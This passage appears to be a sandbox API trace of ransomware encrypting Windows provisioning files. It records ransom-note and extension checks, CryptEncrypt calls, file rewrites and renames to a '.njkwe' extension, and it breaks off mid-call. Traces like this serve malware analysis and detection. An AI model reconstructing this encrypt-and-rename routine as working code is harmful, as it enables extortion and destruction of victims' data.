(lpString1="194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.222] lstrcmpiW (lpString1="194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.222] lstrcmpiW (lpString1="194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.222] lstrcmpiW (lpString1="194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.222] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml") returned 158 [0077.222] StrStrIW (lpFirst="194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.222] lstrcmpW (lpString1="194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.222] lstrcmpW (lpString1="194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.222] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\194__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.222] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\194__connections_cellular_airtel (india)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.223] GetTickCount () returned 0x1153a46 [0077.223] GetTickCount () returned 0x1153a46 [0077.223] GetTickCount () returned 0x1153a46 [0077.223] GetTickCount () returned 0x1153a46 [0077.223] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.223] GetProcessHeap () returned 0xbe0000 [0077.223] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.223] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0077.236] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.236] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0077.237] GetProcessHeap () returned 0xbe0000 [0077.237] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.237] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.237] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.237] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.237] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.237] CloseHandle (hObject=0x43c) returned 1 [0077.237] GetProcessHeap () returned 0xbe0000 [0077.237] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.237] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0077.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\194__connections_cellular_airtel (india)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\194__connections_cellular_airtel (india)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.238] GetProcessHeap () returned 0xbe0000 [0077.238] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.238] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90759156, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90759156, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90759156, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x286, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="195__C~1.PRO")) returned 1 [0077.238] lstrcmpiW (lpString1="195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.238] lstrcmpiW (lpString1="195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.238] lstrcmpiW (lpString1="195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.238] lstrcmpiW (lpString1="195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.238] lstrcmpiW (lpString1="195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.238] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml") returned 163 [0077.238] StrStrIW (lpFirst="195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.238] lstrcmpW (lpString1="195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.238] lstrcmpW (lpString1="195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.238] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\195__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.238] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\195__connections_cellular_indosat (indonesia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.239] GetTickCount () returned 0x1153a56 [0077.239] GetTickCount () returned 0x1153a56 [0077.239] GetTickCount () returned 0x1153a56 [0077.239] GetTickCount () returned 0x1153a56 [0077.239] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.239] GetProcessHeap () returned 0xbe0000 [0077.239] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.239] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0077.240] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.240] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0077.241] GetProcessHeap () returned 0xbe0000 [0077.241] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.241] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.241] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.241] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.241] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.241] CloseHandle (hObject=0x43c) returned 1 [0077.241] GetProcessHeap () returned 0xbe0000 [0077.241] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.241] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.241] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\195__connections_cellular_indosat (indonesia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\195__Connections_Cellular_Indosat (Indonesia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\195__connections_cellular_indosat (indonesia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.242] GetProcessHeap () returned 0xbe0000 [0077.242] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.242] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90759156, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90759156, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90759156, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x286, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml", cAlternateFileName="196__C~1.PRO")) returned 1 [0077.242] lstrcmpiW (lpString1="196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.242] lstrcmpiW (lpString1="196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.242] lstrcmpiW (lpString1="196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.242] lstrcmpiW (lpString1="196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.242] lstrcmpiW (lpString1="196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.242] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml") returned 163 [0077.242] StrStrIW (lpFirst="196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.242] lstrcmpW (lpString1="196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.242] lstrcmpW (lpString1="196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.242] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\196__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.242] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\196__connections_cellular_indosat (indonesia)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.243] GetTickCount () returned 0x1153a56 [0077.243] GetTickCount () returned 0x1153a56 [0077.243] GetTickCount () returned 0x1153a56 [0077.243] GetTickCount () returned 0x1153a56 [0077.243] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.243] GetProcessHeap () returned 0xbe0000 [0077.243] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.243] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0077.244] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.244] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x286, lpOverlapped=0x0) returned 1 [0077.245] GetProcessHeap () returned 0xbe0000 [0077.245] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.245] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.245] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.245] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.245] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.245] CloseHandle (hObject=0x43c) returned 1 [0077.245] GetProcessHeap () returned 0xbe0000 [0077.245] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.245] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\196__connections_cellular_indosat (indonesia)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\196__Connections_Cellular_Indosat (Indonesia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\196__connections_cellular_indosat (indonesia)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.246] GetProcessHeap () returned 0xbe0000 [0077.246] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.246] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90759156, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90759156, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90759156, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="197__C~1.PRO")) returned 1 [0077.246] lstrcmpiW (lpString1="197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.246] lstrcmpiW (lpString1="197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.246] lstrcmpiW (lpString1="197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.246] lstrcmpiW (lpString1="197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.246] lstrcmpiW (lpString1="197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.246] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml") returned 165 [0077.246] StrStrIW (lpFirst="197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.246] lstrcmpW (lpString1="197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.246] lstrcmpW (lpString1="197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.246] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\197__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.246] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\197__connections_cellular_telkomsel (indonesia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.247] GetTickCount () returned 0x1153a56 [0077.247] GetTickCount () returned 0x1153a56 [0077.247] GetTickCount () returned 0x1153a56 [0077.247] GetTickCount () returned 0x1153a56 [0077.247] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.247] GetProcessHeap () returned 0xbe0000 [0077.247] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.247] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0077.248] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.248] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0077.248] GetProcessHeap () returned 0xbe0000 [0077.248] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.248] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.248] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.249] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.249] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.249] CloseHandle (hObject=0x43c) returned 1 [0077.249] GetProcessHeap () returned 0xbe0000 [0077.249] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.249] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\197__Connections_Cellular_Telkomsel (Indonesia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\197__connections_cellular_telkomsel (indonesia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\197__Connections_Cellular_Telkomsel 